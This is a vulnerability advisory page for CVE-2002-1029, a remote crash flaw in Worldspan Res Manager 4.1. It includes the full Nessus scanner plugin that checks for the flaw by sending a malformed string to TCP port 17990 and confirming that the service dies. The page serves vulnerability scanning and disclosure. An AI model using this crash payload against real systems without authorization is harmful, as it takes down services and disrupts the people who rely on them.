Vulnerabilities > CVE-2002-1029 - Denial Of Service vulnerability in Worldspan RES Manager 4.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
worldspan
nessus
exploit available
NVD
Published: 2002-10-04
Updated: 2008-09-05

Summary

Res Manager in Worldspan for Windows Gateway 4.1 allows remote attackers to cause a denial of service (crash) via a malformed request to TCP port 17990.

Vulnerable Configurations

Part Description Count
Application
Worldspan
1

Exploit-Db

descriptionWorldSpan Res Manager 4.1 Malformed TCP Packet Denial Of Service Vulnerability. CVE-2002-1029 . Dos exploit for windows platform
idEDB-ID:21594
last seen2016-02-02
modified2002-07-04
published2002-07-04
reporteraltomo
sourcehttps://www.exploit-db.com/download/21594/
titleWorldSpan Res Manager 4.1 Malformed TCP Packet Denial of Service Vulnerability

Nessus

NASL familyWindows
NASL idWORLDSPAN_GW_DOS.NASL
descriptionIt was possible to crash the Worldspan gateway by sending illegal data. An attacker may use this attack to make this service crash continuously.
last seen2020-06-01
modified2020-06-02
plugin id11049
published2002-07-19
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11049
titleWorldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS
code
#
# (C) Tenable Network Security, Inc.
#

# This script was written by Michel Arboi <[email protected]>, starting
# from quake3_dos.nasl and a proof of concept code by <[email protected]>
#
# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added BugtraqID and CAN
#
# References:
# From: "altomo" <[email protected]>
# To: [email protected]
# Subject: Worldspan DoS
# Date: Thu, 4 Jul 2002 15:22:11 -0500
#

include( 'compat.inc' );

if(description)
{
  script_id(11049);
  script_version("1.21");
  script_cve_id("CVE-2002-1029");
  script_bugtraq_id(5169);

  script_name(english:"Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS");
  script_summary(english:"Wordlspan DoS");

   script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is vulnerable to denial of service.'
  );

  script_set_attribute(
    attribute:'description',
    value:"It was possible to crash the Worldspan gateway by sending illegal data.

An attacker may use this attack to make this service crash continuously."
  );

  script_set_attribute(
    attribute:'solution',
    value: "This produce was not patched by the vendor, its use should be discontinued."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://seclists.org/bugtraq/2002/Jul/49'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/07/19");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/07/04");
 script_cvs_date("Date: 2018/11/15 20:50:29");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
  script_family(english:"Windows");
  script_require_ports(17990);
  exit(0);
}

#
# I suspect that the service will be killed by find_service1.nasl before
# this script can do anything...
#
include("global_settings.inc");
include("misc_func.inc");

port = 17990;
s = 'worldspanshouldgoboom\r';

if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (!soc) exit(0);

send(socket:soc, data:s);
close(soc);
# According to the advisory, Worldspan eats CPU and crashes after ~ 1 min
sleep(60);
if (service_is_dead(port: port) > 0)
  security_warning(port);

References